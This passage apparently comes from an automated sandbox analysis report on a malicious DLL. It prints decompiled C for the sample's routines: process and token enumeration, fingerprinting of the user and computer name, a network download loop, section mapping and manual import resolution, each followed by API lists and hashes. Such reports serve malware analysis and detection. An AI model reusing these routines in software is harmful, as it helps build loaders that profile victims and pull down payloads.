                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001713,0000000A,?,?), ref: 10001E20
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001E36
                                • _snwprintf.NTDLL ref: 10001E5B
                                • CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 10001E80
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001E97
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001EAB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001EC3
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A), ref: 10001ECC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001ED4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID: @Mt MtTt$`RtAt
                                • API String ID: 1724014008-3198888170
                                • Opcode ID: 6ddc9452e52b06252f8c475821b7316f81045a23dadab414d7ce86af3ad915a6
                                • Instruction ID: 254ce7f55be2e700fe156080e3ad539a5a5a63b5fbf22f3b945be7b030c8b019
                                • Opcode Fuzzy Hash: 6ddc9452e52b06252f8c475821b7316f81045a23dadab414d7ce86af3ad915a6
                                • Instruction Fuzzy Hash: A7217FB6A00158AFF711EFA4CC84EDF77ADEB483D1F218029FA15D7194DA7099418B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Legend: Executed / Not Executed
                                • [graph for function 10001540 (basic blocks 10001540-1000167b) not reproduced in text]
                                C-Code - Quality: 83%
                                			E10001540(char _a4) {
                                				long _v8;
                                				long _v12;
                                				char _v36;
                                				void* __edi;
                                				long _t25;
                                				long _t27;
                                				long _t28;
                                				long _t32;
                                				void* _t38;
                                				intOrPtr _t40;
                                				signed int _t44;
                                				signed int _t45;
                                				long _t50;
                                				intOrPtr _t52;
                                				signed int _t53;
                                				void* _t57;
                                				void* _t60;
                                				signed int _t62;
                                				signed int _t63;
                                				void* _t67;
                                				intOrPtr* _t68;
                                
                                				_t25 = E10001EE5();
                                				_v8 = _t25;
                                				if(_t25 != 0) {
                                					return _t25;
                                				}
                                				do {
                                					_t62 = 0;
                                					_v12 = 0;
                                					_t50 = 0x30;
                                					do {
                                						_t57 = E10001B5A(_t50);
                                						if(_t57 == 0) {
                                							_v8 = 8;
                                						} else {
                                							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                							_t53 = _t44;
                                							_t45 = _t44 & 0x0000ffff;
                                							_v8 = _t45;
                                							if(_t45 == 4) {
                                								_t50 = _t50 + 0x30;
                                							}
                                							_t63 = 0x13;
                                							_t10 = _t53 + 1; // 0x1
                                							_t62 =  *_t57 % _t63 + _t10;
                                							E1000167E(_t57);
                                						}
                                					} while (_v8 != 0);
                                					_t27 = E10001B6F(_t57, _t62); // executed
                                					_v8 = _t27;
                                					Sleep(_t62 << 4); // executed
                                					_t28 = _v8;
                                				} while (_t28 == 9);
                                				if(_t28 != 0) {
                                					L25:
                                					return _t28;
                                				}
                                				if(_a4 != 0) {
                                					L18:
                                					_push(0);
                                					_t67 = E10001FB2(E1000169A,  &_v36);
                                					if(_t67 == 0) {
                                						_v8 = GetLastError();
                                					} else {
                                						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                						_v8 = _t32;
                                						if(_t32 == 0) {
                                							GetExitCodeThread(_t67,  &_v8);
                                						}
                                						CloseHandle(_t67);
                                					}
                                					_t28 = _v8;
                                					if(_t28 == 0xffffffff) {
                                						_t28 = GetLastError();
                                					}
                                					goto L25;
                                				}
                                				if(E10001402(_t53,  &_a4) != 0) {
                                					 *0x10004138 = 0;
                                					goto L18;
                                				}
                                				_t52 = _a4;
                                				_t68 = __imp__GetLongPathNameW;
                                				_t38 =  *_t68(_t52, 0, 0); // executed
                                				_t60 = _t38;
                                				if(_t60 == 0) {
                                					L16:
                                					 *0x10004138 = _t52;
                                					goto L18;
                                				}
                                				_t19 = _t60 + 2; // 0x2
                                				_t40 = E10001B5A(_t60 + _t19);
                                				 *0x10004138 = _t40;
                                				if(_t40 == 0) {
                                					goto L16;
                                				}
                                				 *_t68(_t52, _t40, _t60); // executed
                                				E1000167E(_t52);
                                				goto L18;
                                			}

                                APIs
                                  • Part of subcall function 10001EE5: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                  • Part of subcall function 10001EE5: GetVersion.KERNEL32 ref: 10001F03
                                  • Part of subcall function 10001EE5: GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                  • Part of subcall function 10001EE5: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • NtQuerySystemInformation.NTDLL ref: 10001575
                                • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 100015BC
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100015F2
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001610
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,1000169A,?,00000000), ref: 10001647
                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001659
                                • CloseHandle.KERNEL32(00000000), ref: 10001660
                                • GetLastError.KERNEL32(1000169A,?,00000000), ref: 10001668
                                • GetLastError.KERNEL32 ref: 10001675
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                • String ID: @Mt MtTt
                                • API String ID: 3479304935-608512568
                                • Opcode ID: 74c3687ed9d293a66368c12b95b97cd3079d51e485374540016578b7d69d9e27
                                • Instruction ID: 285dab0012166d7ca4fd78fd081d31803307da6268f270452850b2542231148d
                                • Opcode Fuzzy Hash: 74c3687ed9d293a66368c12b95b97cd3079d51e485374540016578b7d69d9e27
                                • Instruction Fuzzy Hash: E231BF75901626ABF711DFA48C94ADF7BECEF442E5F154126F901E7148EB31DE408BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Legend: Executed / Not Executed
                                • [graph for function d47a2e (basic blocks d47a2e-d47b3a) not reproduced in text]
                                C-Code - Quality: 96%
                                			E00D47A2E(char __eax, void* __esi) {
                                				long _v8;
                                				char _v12;
                                				signed int _v16;
                                				signed int _v20;
                                				signed int _v28;
                                				long _t34;
                                				signed int _t39;
                                				long _t50;
                                				char _t59;
                                				intOrPtr _t61;
                                				void* _t62;
                                				void* _t64;
                                				char _t65;
                                				intOrPtr* _t67;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t69 = __esi;
                                				_t65 = __eax;
                                				_v8 = 0;
                                				_v12 = __eax;
                                				if(__eax == 0) {
                                					_t59 =  *0xd4d270; // 0xd448b889
                                					_v12 = _t59;
                                				}
                                				_t64 = _t69;
                                				E00D44F97( &_v12, _t64);
                                				if(_t65 != 0) {
                                					 *_t69 =  *_t69 ^  *0xd4d2a4 ^ 0x46d76429;
                                				} else {
                                					GetUserNameW(0,  &_v8); // executed
                                					_t50 = _v8;
                                					if(_t50 != 0) {
                                						_t62 = RtlAllocateHeap( *0xd4d238, 0, _t50 + _t50);
                                						if(_t62 != 0) {
                                							if(GetUserNameW(_t62,  &_v8) != 0) {
                                								_t64 = _t62;
                                								 *_t69 =  *_t69 ^ E00D42C0D(_v8 + _v8, _t64);
                                							}
                                							HeapFree( *0xd4d238, 0, _t62);
                                						}
                                					}
                                				}
                                				_t61 = __imp__;
                                				_v8 = _v8 & 0x00000000;
                                				GetComputerNameW(0,  &_v8);
                                				_t34 = _v8;
                                				if(_t34 != 0) {
                                					_t68 = RtlAllocateHeap( *0xd4d238, 0, _t34 + _t34);
                                					if(_t68 != 0) {
                                						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                							_t64 = _t68;
                                							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00D42C0D(_v8 + _v8, _t64);
                                						}
                                						HeapFree( *0xd4d238, 0, _t68);
                                					}
                                				}
                                				asm("cpuid");
                                				_t67 =  &_v28;
                                				 *_t67 = 1;
                                				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                				 *((intOrPtr*)(_t67 + 8)) = 0;
                                				 *(_t67 + 0xc) = _t64;
                                				_t39 = _v16 ^ _v20 ^ _v28;
                                				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
                                				return _t39;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00D47A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00D47A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00D47A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00D430EE), ref: 00D47AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D47AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00D47AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D47AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00D430EE), ref: 00D47B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: 1414793870c4da559ed14fa8b6e90642c279b53e6c63a49ceba1c01fe60ffe54
                                • Instruction ID: b157432f3302821b28e2533c4596a9a1d52d47f2baa265d1ab2f5da1f5fb6fe0
                                • Opcode Fuzzy Hash: 1414793870c4da559ed14fa8b6e90642c279b53e6c63a49ceba1c01fe60ffe54
                                • Instruction Fuzzy Hash: 27310476A04209EFDB10DFA9DD81A6EB7FAEF48304F254469E505D7220EB70EE019B30
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E00D49A0F(char _a4, void* _a8) {
                                				void* _v8;
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				char _v24;
                                				char _v28;
                                				char _v32;
                                				char _v36;
                                				char _v40;
                                				void* _v44;
                                				void** _t33;
                                				void* _t40;
                                				void* _t43;
                                				void** _t44;
                                				intOrPtr* _t47;
                                				char _t48;
                                
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v20 = _a4;
                                				_t48 = 0;
                                				_v16 = 0;
                                				_a4 = 0;
                                				_v44 = 0x18;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v28 = 0;
                                				_v24 = 0;
                                				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E00D41525(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E00D48B22(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00D49A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00D49A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D49A85
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D49AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00D49AAF
                                • NtClose.NTDLL(?), ref: 00D49AC1
                                • NtClose.NTDLL(00000000), ref: 00D49ACB
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: f54eac8406d7301339bf260c379058cd63fd2ceb724d2686b77592f22f14cfd7
                                • Instruction ID: 8af2296eee91bd8005da06baa08d2db1eb3b4e4497ab2ee0658589c00c2f62f8
                                • Opcode Fuzzy Hash: f54eac8406d7301339bf260c379058cd63fd2ceb724d2686b77592f22f14cfd7
                                • Instruction Fuzzy Hash: 8C21E4B6950218FBDB019F95DC45EDEBFBDEF09780F108026FA05E6260D7B19A449BB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 71%
                                			E00D45988(void* __eax, void* __ecx) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				void _v20;
                                				void* __esi;
                                				void* _t30;
                                				int _t34;
                                				void* _t38;
                                				intOrPtr* _t39;
                                				intOrPtr* _t41;
                                				int _t45;
                                				void* _t54;
                                				long _t64;
                                				void* _t67;
                                				void* _t69;
                                
                                				_t58 = __ecx;
                                				_t67 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t30 = _t67;
                                					_pop(_t68);
                                					_t69 = _t30;
                                					_t64 = 0;
                                					ResetEvent( *(_t69 + 0x1c));
                                					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
                                					if(_t34 != 0) {
                                						L9:
                                						if(_v8 == 0) {
                                							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                						} else {
                                							 *0xd4d164(0, 1,  &_v12); // executed
                                							if(0 != 0) {
                                								_t64 = 8;
                                							} else {
                                								_t38 = E00D41525(0x1000);
                                								_v16 = _t38;
                                								if(_t38 == 0) {
                                									_t64 = 8;
                                								} else {
                                									_push(0);
                                									_push(_v8);
                                									_push( &_v20);
                                									while(1) {
                                										_t41 = _v12;
                                										_t61 =  *_t41;
                                										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                										ResetEvent( *(_t69 + 0x1c));
                                										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
                                										if(_t45 != 0) {
                                											goto L17;
                                										}
                                										_t64 = GetLastError();
                                										if(_t64 == 0x3e5) {
                                											_t64 = E00D429C0( *(_t69 + 0x1c), _t61, 0xffffffff);
                                											if(_t64 == 0) {
                                												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                												if(_t64 == 0) {
                                													goto L17;
                                												}
                                											}
                                										}
                                										L19:
                                										E00D48B22(_v16);
                                										if(_t64 == 0) {
                                											_t64 = E00D448CB(_v12, _t69);
                                										}
                                										goto L22;
                                										L17:
                                										_t64 = 0;
                                										if(_v8 != 0) {
                                											_push(0);
                                											_push(_v8);
                                											_push(_v16);
                                											continue;
                                										}
                                										goto L19;
                                									}
                                								}
                                								L22:
                                								_t39 = _v12;
                                								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                							}
                                						}
                                					} else {
                                						_t64 = GetLastError();
                                						if(_t64 != 0x3e5) {
                                							L8:
                                							if(_t64 == 0) {
                                								goto L9;
                                							}
                                						} else {
                                							_t64 = E00D429C0( *(_t69 + 0x1c), _t58, 0xffffffff);
                                							if(_t64 == 0) {
                                								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                								goto L8;
                                							}
                                						}
                                					}
                                					return _t64;
                                				} else {
                                					_t54 = E00D457DD(__ecx, __eax);
                                					if(_t54 != 0) {
                                						return _t54;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 00D4A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 00D4A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 00D4A576
                                • ResetEvent.KERNEL32(?), ref: 00D4A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 00D4A600
                                • GetLastError.KERNEL32 ref: 00D4A60A
                                  • Part of subcall function 00D457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 00D457F4
                                  • Part of subcall function 00D457DD: SetEvent.KERNEL32(?), ref: 00D45804
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00D45836
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4585B
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4587B
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: bf4da061c7da584d3d6f4acac93ddbd97c3b443c6a619692485e8883f652091a
                                • Instruction ID: e6900514173e9bb971e3474099f6760349928787b44f71b68214a3e0c03fc0b0
                                • Opcode Fuzzy Hash: bf4da061c7da584d3d6f4acac93ddbd97c3b443c6a619692485e8883f652091a
                                • Instruction Fuzzy Hash: 2641C336640A00EBDF219FA9DC44BAEB3B9EF84360F1A0528E552E7190EB30DD419B71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D49267() {
                                				long _v8;
                                				long _v12;
                                				int _v16;
                                				long _t39;
                                				long _t43;
                                				signed int _t47;
                                				short _t51;
                                				signed int _t52;
                                				int _t56;
                                				int _t57;
                                				char* _t64;
                                				short* _t67;
                                
                                				_v16 = 0;
                                				_v8 = 0;
                                				GetUserNameW(0,  &_v8); // executed
                                				_t39 = _v8;
                                				if(_t39 != 0) {
                                					_v12 = _t39;
                                					_v8 = 0;
                                					GetComputerNameW(0,  &_v8);
                                					_t43 = _v8;
                                					if(_t43 != 0) {
                                						_v12 = _v12 + _t43 + 2;
                                						_t64 = E00D41525(_v12 + _t43 + 2 << 2);
                                						if(_t64 != 0) {
                                							_t47 = _v12;
                                							_t67 = _t64 + _t47 * 2;
                                							_v8 = _t47;
                                							if(GetUserNameW(_t67,  &_v8) == 0) {
                                								L7:
                                								E00D48B22(_t64);
                                							} else {
                                								_t51 = 0x40;
                                								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                								_t52 = _v8;
                                								_v12 = _v12 - _t52;
                                								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                									goto L7;
                                								} else {
                                									_t56 = _v12 + _v8;
                                									_t31 = _t56 + 2; // 0xd49cb2
                                									_v12 = _t56;
                                									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                									_v8 = _t57;
                                									if(_t57 == 0) {
                                										goto L7;
                                									} else {
                                										_t64[_t57] = 0;
                                										_v16 = _t64;
                                									}
                                								}
                                							}
                                						}
                                					}
                                				}
                                				return _v16;
                                			}

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,00D49CB0), ref: 00D4927B
                                • GetComputerNameW.KERNEL32(00000000,00D49CB0), ref: 00D49297
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetUserNameW.ADVAPI32(00000000,00D49CB0), ref: 00D492D1
                                • GetComputerNameW.KERNEL32(00D49CB0,?), ref: 00D492F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00D49CB0,00000000,00D49CB2,00000000,00000000,?,?,00D49CB0), ref: 00D49317
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 961e6bc38baa5f05f766506e60b16c64e16de5384d07084139a8765e1fbd93f2
                                • Instruction ID: cb89ba1b54c474de3f94986b2ef39f0b15760c20d17b54da23d7a69f19b56b99
                                • Opcode Fuzzy Hash: 961e6bc38baa5f05f766506e60b16c64e16de5384d07084139a8765e1fbd93f2
                                • Instruction Fuzzy Hash: 3221E876900208FFCB11DFE9D989DEEBBB8EF45304B5444AAE501E7250D6309F45DB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E1000119D(intOrPtr* __eax, void** _a4) {
                                				int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				int _v28;
                                				int _v32;
                                				intOrPtr _v36;
                                				int _v40;
                                				int _v44;
                                				void* _v48;
                                				void* __esi;
                                				long _t34;
                                				void* _t39;
                                				void* _t47;
                                				intOrPtr* _t48;
                                
                                				_t48 = __eax;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v24 =  *((intOrPtr*)(__eax + 4));
                                				_v16 = 0;
                                				_v12 = 0;
                                				_v48 = 0x18;
                                				_v44 = 0;
                                				_v36 = 0x40;
                                				_v40 = 0;
                                				_v32 = 0;
                                				_v28 = 0;
                                				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                				if(_t34 < 0) {
                                					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                				} else {
                                					 *_t48 = _v16;
                                					_t39 = E1000129A(_t48,  &_v12); // executed
                                					_t47 = _t39;
                                					if(_t47 != 0) {
                                						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                					} else {
                                						memset(_v12, 0, _v24);
                                						 *_a4 = _v12;
                                					}
                                				}
                                				return _t47;
                                			}

                                0x100011a6
                                0x100011ad
                                0x100011ae
                                0x100011af
                                0x100011b0
                                0x100011b1
                                0x100011c2
                                0x100011c6
                                0x100011da
                                0x100011dd
                                0x100011e0
                                0x100011e7
                                0x100011ea
                                0x100011f1
                                0x100011f4
                                0x100011f7
                                0x100011fa
                                0x100011ff
                                0x1000123a
                                0x10001201
                                0x10001204
                                0x1000120a
                                0x1000120f
                                0x10001213
                                0x10001231
                                0x10001215
                                0x1000121c
                                0x1000122a
                                0x1000122a
                                0x10001213
                                0x10001242

                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 100011FA
                                  • Part of subcall function 1000129A: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,1000120F,00000002,00000000,?,?,00000000,?,?,1000120F,00000002), ref: 100012C7
                                • memset.NTDLL ref: 1000121C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Section$CreateViewmemset
                                • String ID: @
                                • API String ID: 2533685722-2766056989
                                • Opcode ID: 265b71dd6ff0657094f66a8f67bacc0947f81f036b07ed031d0e4457376ecc91
                                • Instruction ID: fb0ef012b85b6010ba7c5694ad3768ad2f66879cb32ce24129577d482c24e11d
                                • Opcode Fuzzy Hash: 265b71dd6ff0657094f66a8f67bacc0947f81f036b07ed031d0e4457376ecc91
                                • Instruction Fuzzy Hash: 96211AB6D00209AFDB11DFA9C8849DEFBF9EF48354F10842AE615F3211D735AA558BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E10001753(void* __edi, intOrPtr _a4) {
                                				signed int _v8;
                                				intOrPtr* _v12;
                                				_Unknown_base(*)()** _v16;
                                				signed int _v20;
                                				signed short _v24;
                                				struct HINSTANCE__* _v28;
                                				intOrPtr _t43;
                                				intOrPtr* _t45;
                                				intOrPtr _t46;
                                				struct HINSTANCE__* _t47;
                                				intOrPtr* _t49;
                                				intOrPtr _t50;
                                				signed short _t51;
                                				_Unknown_base(*)()* _t53;
                                				CHAR* _t54;
                                				_Unknown_base(*)()* _t55;
                                				void* _t58;
                                				signed int _t59;
                                				_Unknown_base(*)()* _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t65;
                                				signed int _t68;
                                				void* _t69;
                                				CHAR* _t71;
                                				signed short* _t73;
                                
                                				_t69 = __edi;
                                				_v20 = _v20 & 0x00000000;
                                				_t59 =  *0x10004140;
                                				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                				if(_t43 != 0) {
                                					_t45 = _t43 + __edi;
                                					_v12 = _t45;
                                					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                					if(_t46 != 0) {
                                						while(1) {
                                							_t71 = _t46 + _t69;
                                							_t47 = LoadLibraryA(_t71); // executed
                                							_v28 = _t47;
                                							if(_t47 == 0) {
                                								break;
                                							}
                                							_v24 = _v24 & 0x00000000;
                                							 *_t71 = _t59 - 0x69b25f44;
                                							_t49 = _v12;
                                							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                							_t50 =  *_t49;
                                							if(_t50 != 0) {
                                								L6:
                                								_t73 = _t50 + _t69;
                                								_v16 = _t61 + _t69;
                                								while(1) {
                                									_t51 =  *_t73;
                                									if(_t51 == 0) {
                                										break;
                                									}
                                									if(__eflags < 0) {
                                										__eflags = _t51 - _t69;
                                										if(_t51 < _t69) {
                                											L12:
                                											_t21 =  &_v8;
                                											 *_t21 = _v8 & 0x00000000;
                                											__eflags =  *_t21;
                                											_v24 =  *_t73 & 0x0000ffff;
                                										} else {
                                											_t65 = _a4;
                                											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                												goto L12;
                                											} else {
                                												goto L11;
                                											}
                                										}
                                									} else {
                                										_t51 = _t51 + _t69;
                                										L11:
                                										_v8 = _t51;
                                									}
                                									_t53 = _v8;
                                									__eflags = _t53;
                                									if(_t53 == 0) {
                                										_t54 = _v24 & 0x0000ffff;
                                									} else {
                                										_t54 = _t53 + 2;
                                									}
                                									_t55 = GetProcAddress(_v28, _t54);
                                									__eflags = _t55;
                                									if(__eflags == 0) {
                                										_v20 = _t59 - 0x69b25ec5;
                                									} else {
                                										_t68 = _v8;
                                										__eflags = _t68;
                                										if(_t68 != 0) {
                                											 *_t68 = _t59 - 0x69b25f44;
                                										}
                                										 *_v16 = _t55;
                                										_t58 = 0x593682f4 + _t59 * 4;
                                										_t73 = _t73 + _t58;
                                										_t32 =  &_v16;
                                										 *_t32 = _v16 + _t58;
                                										__eflags =  *_t32;
                                										continue;
                                									}
                                									goto L23;
                                								}
